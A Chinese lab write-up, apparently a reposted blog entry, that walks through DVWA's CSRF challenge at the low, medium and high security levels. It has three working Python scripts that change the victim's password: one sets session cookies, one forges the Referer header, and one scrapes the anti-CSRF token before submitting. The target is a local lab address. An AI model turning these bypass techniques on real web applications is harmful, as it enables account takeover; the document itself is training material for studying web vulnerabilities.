DVWA - CSRF (low, medium, high)
来源:互联网 发布:快易数据恢复大师 编辑:程序博客网 时间:2024/04/28 05:20
low
设置一下cookie的PHPSESSID和security即可跨站请求
import requestsdef main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=low', } new_password = 'ac' url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password) res = requests.get(url, headers=headers) if 'Password Changed.' in res.content: print('Yes') else: print('No')if __name__ == '__main__': main()
medium
查看源码,发现
// Checks to see where the request came from if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
根据Referer验证请求来源,绕过思路:在HTTP请求头声明Referer。
import requestsdef main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=medium', 'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/' } new_password = 'ac' url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password) res = requests.get(url, headers=headers) if 'Password Changed.' in res.content: print('Yes') else: print('No')if __name__ == '__main__': main()
high
查看源码,发现多了动态user_token验证
// Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
绕过思路:在代码层面发跨站请求动态获取user_token,再发跨站请求修改密码。
import requestsimport redef main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=high', 'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/' } res = requests.get(url, headers=headers) m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S) if m: user_token = m.group(1) new_password = 'ac' url = '%s?password_new=%s&password_conf=%s&user_token=%s&Change=Change' % (url, new_password, new_password, user_token) res = requests.get(url, headers=headers) if 'Password Changed.' in res.content: print('Yes') else: print('No') print(res.content)if __name__ == '__main__': main()
注:这3个实验要跨站,别一直都在本地同一个浏览器测试,这没意思。
0 0
- DVWA - CSRF (low, medium, high)
- DVWA - Brute Force (low, medium, high)
- DVWA - Command Injection (low, medium, high)
- DVWA - File Inclusion (low, medium, high)
- DVWA - File Upload (low, medium, high)
- DVWA - SQL Injection (low, medium, high)
- DVWA - XSS (Reflected) (low, medium, high)
- DVWA - XSS (Stored) (low, medium, high)
- dvwa csrf
- dvwa-csrf
- DVWA之CSRF
- Dvwa系列之csrf
- [实验]csrf dvwa
- DVWA Upload漏洞(medium)
- DVWA - SQL Injection (Blind) (low)
- 通过DVWA学习CSRF漏洞
- DVWA笔记之三:CSRF
- Dvwa之Csrf攻击笔记
- CVPR 2017-01-06
- 8. 工厂方法设计模式
- 【矩阵快速幂】nyoj301 递推求值
- 小结oracle与mysql的分页
- 常用算法之快速排序---笔记
- DVWA - CSRF (low, medium, high)
- 不借助第三个变量实现两个变量的交换(数字或者字符串)
- 乐观锁与悲观锁的定义及区别
- android IBeacon 开发(下)修改IBeacon参数
- C++ using 总结
- Tensorflow的SWIG编程
- php 基础之 $ 与单双引号的关系
- Effective c++读书笔记 1
- easyui表格的实现